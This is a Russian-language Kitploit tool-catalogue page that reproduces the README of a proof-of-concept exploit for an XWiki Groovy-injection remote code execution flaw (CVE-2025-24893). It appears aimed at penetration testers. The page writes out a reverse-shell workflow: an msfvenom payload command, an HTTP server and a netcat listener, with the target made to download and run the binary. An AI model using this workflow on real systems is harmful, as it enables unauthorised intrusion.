Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-24893 — PoC эксплуатирует CVE-2025-24893, уязвимость удаленного выполнения кода (RCE) в XWiki, вызванную неправильной изоляцией в Groovy-макросах, отображаемых асинхронно. Она позволяет выполнять произвольные команды через внедрение в конечные точки SolrSearch на основе RSS. | Kitploit
Инструменты/GitHubGitHub/infinit3i/cve-2025-24893
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияШелл-кодЭксплуатация веб-приложенийКомандование и Управление
GitHubinfinit3i/cve-2025-24893

CVE-2025-24893

PoC эксплуатирует CVE-2025-24893, уязвимость удаленного выполнения кода (RCE) в XWiki, вызванную неправильной изоляцией в Groovy-макросах, отображаемых асинхронно. Она позволяет выполнять произвольные команды через внедрение в конечные точки SolrSearch на основе RSS.

Репозиторий
6121 год назадЕщё не проверено
Сайт

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

XWiki CVE-2025-24893 Доказательство концепции

Авторы: Net.Doge & Infinit3i


Изображение CVE-2025-24893



Подписка в Twitter


Этот скрипт на Python эксплуатирует уязвимость CVE-2025-24893 — удаленное выполнение кода (RCE) в XWiki, вызванное некорректной изоляцией Groovy-макросов, отображаемых асинхронно. Он позволяет выполнять произвольные команды через внедрение в RSS-основанные конечные точки SolrSearch.

📌 Возможности

  • Выполнение одной команды через внедрение Groovy
  • Автоматическая генерация полезной нагрузки reverse shell (с помощью msfvenom)
  • Возможность настройки:
    • Удаленная цель
  • Локальный IP-адрес
  • Порт HTTP-сервера
  • Порт beacon reverse shell
  • Чистый предпросмотр bash-полезной нагрузки
  • Интерактивный TUI с цветовой кодировкой ANSI
  • 🚀 Использование

    1. Клонируйте или скачайте скрипт.

    2. Убедитесь, что у вас установлено следующее:

      • msfvenom из Metasploit
      • Python 3
      • jq (используется в bash-полезных нагрузках)
    3. Запустите скрипт:

    root@kitploit:~
    python3 CVE-2025-24893-PoC.py
    
    1. Выберите из меню:

      • Run Command – Выполнить любую команду оболочки удаленно.
      • Reverse Shell – Сгенерировать и развернуть ELF reverse shell на цель.
      • Change Settings – Изменить LHOST, RHOST, порт сервера или порт beacon.

    🧪 Рабочий процесс Reverse Shell

    1. Генерируется полезная нагрузка:
    root@kitploit:~
    msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ваш_ip> LPORT=<порт_beacon> -f elf -o rev
    
    1. Вас попросят запустить Python HTTP-сервер и netcat-слушатель:
    root@kitploit:~
    python3 -m http.server 8080
    nc -lvnp 31337
    
    1. Скрипт отправляет следующую последовательность на цель:

      • Скачать полезную нагрузку
      • Сделать её исполняемой
      • Выполнить бинарный файл

    ⚠️ Отказ от ответственности

    Этот инструмент предназначен только для образовательных и авторизованных целей тестирования. Несанкционированное использование против систем, которые вам не принадлежат или на тестирование которых у вас нет явного разрешения, является незаконным и неэтичным.

    📄 Ссылки

    • XWiki
    • MITRE CVE-2025-24893
    Скачать инструмент